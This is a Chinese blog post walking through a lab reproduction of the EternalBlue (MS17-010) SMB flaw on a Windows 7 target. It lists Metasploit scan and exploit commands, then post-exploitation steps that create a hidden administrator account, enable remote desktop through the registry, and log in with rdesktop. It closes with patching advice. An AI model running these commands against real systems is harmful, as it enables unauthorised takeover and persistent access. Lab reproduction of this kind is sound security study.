永恒之蓝漏洞(ms17-010)复现

0x01 漏洞概述

永恒之蓝漏洞(Eternalblue)是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,无需用户进行任何操作,就可以中招。


0x02 影响版本

目前已知受影响的Windows 版本包括但不限于:
WindowsNT
Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8
Windows Server 2008、Windows Server 2008 R2、Windows Server 2012 SP0


0x03 漏洞复现

复现环境

攻击机:kali 2.0
靶机:Windows 7 X64 (192.168.159.133)

发现主机

两种方法

一、使用nmap扫描

nmap -r 192.168.159.0/24C

二、使用msf扫描模块

kali 执行 msfconsole 进入MSF框架

搜索ms17_010
search ms17_010

使用ms17-010扫描模块,对靶机Win7进行扫描
使用模块
use auxiliary/scanner/smb/smb_ms17_010

设置目标ip
set RHOSTS 192.168.159.133

执行
run

Get Shell

使用模块
use exploit/windows/smb/ms17_010_eternalblue

设置目标ip
set RHOSTS 192.168.159.133

查看选项
shwo options

执行
exploit

成功拿到shell

控制提权

windows shell 下执行:
新建用户
net user dylan 123456 /add

添加管理组
net localgroup administrators dylan /add

开启远程桌面
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

kali 登陆远程桌面:
rdesktop 192.168.159.133:3389


0x04 漏洞修复

  • 在线更新:开启Windows Update更新。
  • 打补丁:点击下载

参考文章

永恒之蓝漏洞复现(ms17-010)
MS17-010 基于”永恒之蓝”实现Windows Getshell


   转载规则


《永恒之蓝漏洞(ms17-010)复现》 dylan 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
CVE-2018-15982任意代码执行漏洞复现 CVE-2018-15982任意代码执行漏洞复现
0x01 漏洞概述2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-20
2019-08-08
下一篇 
WebLogic WLS组件漏洞复现 WebLogic WLS组件漏洞复现
0x01 漏洞概述漏洞编号:CVE-2017-10271 漏洞描述:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导
2019-08-06
  目录